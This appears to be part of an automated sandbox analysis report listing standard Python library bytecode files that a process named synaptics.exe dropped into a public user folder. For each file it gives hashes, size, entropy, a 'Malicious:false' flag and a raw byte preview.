                                                                                                                                                                                                                                  SSDEEP:96:0Z1XUppmx0pYUG0wzU182wl91Tc7mh5JFxy8:4+yN10wz5lTTc7mh51
                                                                                                                                                                                                                                  MD5:251E6144F6225E61AB9C0DC504D42FFB
                                                                                                                                                                                                                                  SHA1:19D623667CF7025BD9D38502BD483701089019C2
                                                                                                                                                                                                                                  SHA-256:4588D684081FD219E064D0824A2B2D3A11E6DE46EB347E17848A84AF154D429D
                                                                                                                                                                                                                                  SHA-512:6C1E812132451F10A95F46665E62DA13E4F105E9A9A19370A3C0C9E8B14B5EC399C80BFB78755A5C0C75A3780039C60F08A492EABB6BC3BA83A82619A187B13A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....+C:\Users\Public\M20EKMMEH2\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t.....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46176
                                                                                                                                                                                                                                  Entropy (8bit):6.062520624013252
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:45YArctd0pztzQUB04zzRYKJFSd6tm2Ya4L+P9cLjYp:I1YdGzbB04zVYAFU6BYa4aPuL8p
                                                                                                                                                                                                                                  MD5:25D1FD08228026FFC062074AA2E7B2D0
                                                                                                                                                                                                                                  SHA1:8B78BF907C9F3EAA88EEF3FD0ABA4B12F408785C
                                                                                                                                                                                                                                  SHA-256:90E739B9247797C20CA7A0818B0FDC11CE721795854E315A28F5CDE8B0B8721D
                                                                                                                                                                                                                                  SHA-512:EC7F409CA1BF2929E685CB0F615EACC4E75DEBEB5F4F03AF64931911E0CAB03D20B53C411BFDE88A8E0FA71D310CB28EA20BE3768ECD6FD12B4B8F05AA73809A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12111
                                                                                                                                                                                                                                  Entropy (8bit):5.377256280597247
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:d+KxmTkRLMC//oLaizJHTWAztIvowudjKauXTsmNDGnA:TmaCzJHbKLXTsmpGnA
                                                                                                                                                                                                                                  MD5:516354D107787183E2A487CF252A3F39
                                                                                                                                                                                                                                  SHA1:C1453AA52CE4171EC32B6F7CA954C4A2CFC03AE7
                                                                                                                                                                                                                                  SHA-256:95729BB2BEB8E0B29D7D9D0AC5D655BF8276D7EA355E602EBC40AAB6FCE6BBCD
                                                                                                                                                                                                                                  SHA-512:AEA6D6B374DCFB4B33CD2FC601E16D22E0F451689911C02A119F7EDCD39BCE4B96CB431E0F878DABC48B38464F49A74269EBE47C278A937E3131CD576BFBE3A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWN..FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONE..FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17630
                                                                                                                                                                                                                                  Entropy (8bit):5.67574660132257
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:mNMcSuUoeg6rHVMN9yByEWG6D+nTF+jZjB77Hb930:mCzgWMEWp4+jZjJ930
                                                                                                                                                                                                                                  MD5:79CE3DF63F8C92B8B438E4CB36726F1E
                                                                                                                                                                                                                                  SHA1:75D931A512ECD3B29E7BFB24ABA52F3359B783C4
                                                                                                                                                                                                                                  SHA-256:404FD41FC7164A56151089D9C708E267F14CFECD05684A11D72DAE0279BC81B9
                                                                                                                                                                                                                                  SHA-512:6DB8515EA154C41F3FBF04394CD2418BEE70E901F5B60FE04C753966F0C79A00A44D8AE8BE6F6055720CF11D8654355075574CF91AF8F27A96474F2BBF42CCB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3944
                                                                                                                                                                                                                                  Entropy (8bit):5.483170285622825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:88lMqPqiKqqHW7Nd5pqKHQwmHv35UqyhWqgv0+USVqtnqqgqhy:88pPq/qq27NVqKleeqdq8LvVqtnqqgqU
                                                                                                                                                                                                                                  MD5:97C789E0F7EBDA6F4207983900A26973
                                                                                                                                                                                                                                  SHA1:13B21FFD07C3601E69A78D14CA9729B34C9044AA
                                                                                                                                                                                                                                  SHA-256:328C37533BB56787B48D031E36AA1F981956C20338FB3DE130388DE019F89C72
                                                                                                                                                                                                                                  SHA-512:01CE7295ECB8B737789244622EEC7AF8D65F65912BC08C3FB543F9E7B1A6FFFCF5D826C758457DEA353C65C81BC520A3A15081D8EA9F1CD5A63B41195C4CF8DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....'C:\Users\Public\M20EKMMEH2\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.z"
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15314
                                                                                                                                                                                                                                  Entropy (8bit):5.433017311527072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:H7Ur8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:ora/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                                                  MD5:C0A4E0991B1F6C856296348792E54765
                                                                                                                                                                                                                                  SHA1:F02E08B98307535E7F2DF7985D343A276E7D31EE
                                                                                                                                                                                                                                  SHA-256:82F36A334ECEACFE2601A1307C6D0CE349E2345D83D0ED01759542C35ACFD4D7
                                                                                                                                                                                                                                  SHA-512:8D3AFF586CE4099B30572A5CC845E7DCD99E937A8B3C1484E736F41538FE71D8572A82631BD02D55A2610A3C5087BBB47C47003098EAFC085892DECA4AAE42E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1758
                                                                                                                                                                                                                                  Entropy (8bit):5.541681650403075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:k5kKoXsYZMmrK2E9zp8ItqhhhUIuoLpP0I2GIikGmObMn:khov2OOqhDaodpkwbMn
                                                                                                                                                                                                                                  MD5:AAAE9696BDF66B25DADF115962DB8422
                                                                                                                                                                                                                                  SHA1:9E44960600E4B99DCA5672533CD434ADE37401ED
                                                                                                                                                                                                                                  SHA-256:968D481E57DD2B25450D468097D5EF815778FAB3B36EDADE62FD9F2DA2BFF1FD
                                                                                                                                                                                                                                  SHA-512:F24A315AE470CF21B6821206305B68B5D79832B1CB3A75D0E85FC5CFC62F511456590953BBB0E6E96201BEE057078E7B5D35E5037A31F2D23C32B667CA86B7A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....,C:\Users\Public\M20EKMMEH2\lib\nturl2path.py..url2pathname....s*.............................................r....c....................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13519
                                                                                                                                                                                                                                  Entropy (8bit):4.846438578166959
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+25I4L+HVe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:N5seTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                                                  MD5:D8A0777F68D1E82960684B14E30B0675
                                                                                                                                                                                                                                  SHA1:A0D6FE4CED0279757F6C2725F8BC5BB7FFB1268B
                                                                                                                                                                                                                                  SHA-256:3BB2E6F5DB15752E7182497E8869B7D8C9EA7C2E5441910612996A1FFE04C2E3
                                                                                                                                                                                                                                  SHA-512:B02E78CD5988885258671564FF8489A14C952A53F4A1EB705D0164AEC45A6AF72C057157CD22CC37C98EC281AB48C976E089BF06A98B2E7E7AEBDE01F91EB49C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31610
                                                                                                                                                                                                                                  Entropy (8bit):5.452462066894043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:mZz4T1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:fbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                                                  MD5:D69C5A40F3004BE9EC326B399CF91043
                                                                                                                                                                                                                                  SHA1:A29AF7B69B887A399336B88C25337342C8A7E467
                                                                                                                                                                                                                                  SHA-256:670811E4234D28483AA76A53F9BD8B8006EF67DE5363763D74FAE53BD912C440
                                                                                                                                                                                                                                  SHA-512:733E1C11E70D9A46154F517113E2AF8A98B546C2106B47609D307CE818F92C2F98D4E7E39790B2054687DBB54061934B95C6FF35732D14C3F389BD2C1915B789
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42063
                                                                                                                                                                                                                                  Entropy (8bit):5.238779347208194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:e9HqwOu28a8BgsMwiT3iWOhVECkoB3RDwgU46Jr8Dybx4YC5UPbmHMx2+64qvWLo:SKwOu2QLMweUhVECkoB3REz4uPx25UjY
                                                                                                                                                                                                                                  MD5:A582097169AFA16E1DE3931C48F9078C
                                                                                                                                                                                                                                  SHA1:983D5D66C9A7B09A3DB80B0BD8BBF325997C9A66
                                                                                                                                                                                                                                  SHA-256:CE88F31EE37C81361114CCA4367F511F002BFDAD65C7EF0F47BF14F14441D805
                                                                                                                                                                                                                                  SHA-512:BC525C85454AF298E3B05C4EF4A18EB4638D63F10039FEEAFA496D8A52143E5F701C83586BA494F44529B56EE43DC9FD088EBB90EFB9CC545F7ACB7F1B9A5B38
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10541
                                                                                                                                                                                                                                  Entropy (8bit):5.329283469436137
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rhb0oivyslc6Yc5JJ0kMzr1z37oItrg2spGuDbTM0tNWCEZC:rhGvLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                                                  MD5:8F57ED7194E8169FE31BFC8E51834377
                                                                                                                                                                                                                                  SHA1:184205E552E093F031BB71059E24FB8B02EBE62C
                                                                                                                                                                                                                                  SHA-256:BA8BF8E70F74250963D326F32976655778F166FCB0B1FA5D2F0E22F61BA5060E
                                                                                                                                                                                                                                  SHA-512:7F95F30DE11F5A1ED2CC3EBE337639472C5F61382C5C0ED16C043D88C123EA40BA254194D07E15A0456A831ECADC7A53EF2EE5E8F86633CB1181D058D6878761
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10803
                                                                                                                                                                                                                                  Entropy (8bit):5.081147678400005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ru+pM4rfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:i+pMSQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                                                  MD5:C29D347837CC3F399DCEC927E90D9169
                                                                                                                                                                                                                                  SHA1:03F51CAC847A3FD268BCF2BD7E2A4DD87F1482DD
                                                                                                                                                                                                                                  SHA-256:B307D857ACEF696BAFF93B153E2CC8DB3AEDD56BF01911FF5123EED2176C8A10
                                                                                                                                                                                                                                  SHA-512:4E2DC0B8B24192CC82919FD9504EC153DE7F02F4D5C5E9BB9A7DE50EE824CABEF27D92C89D2686C2BC62190CE7AB5E34D78ACDB19B239EA6144A307A5E6FB08C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....'C:\Users\Public\M20EKMMEH2\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.e.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5805
                                                                                                                                                                                                                                  Entropy (8bit):5.455191188514344
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kPp0xXxswv10ER2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzOR:oqrswv27GmxMGb+rIWkOFldkS
                                                                                                                                                                                                                                  MD5:CAE93F98D141D63B416A5EC8289B3C9C
                                                                                                                                                                                                                                  SHA1:AB72B377FAAC6B2C2B3EB53D00FFF816BF5DE37F
                                                                                                                                                                                                                                  SHA-256:A2135B8E4A2C06B4E609B1A50A6EC117C447FED5566DB13C00823BB878E8560C
                                                                                                                                                                                                                                  SHA-512:68448330D31CEFA1AB4FADF4081B993B220F2D99D72696548103ADA6D6767BFC3E6D7CA748FFD3EB55059C130B3D04A6075BEFB94B7593EDD0E8D774820F551B
                                                                                                                                                                                                                                  Malicious:false
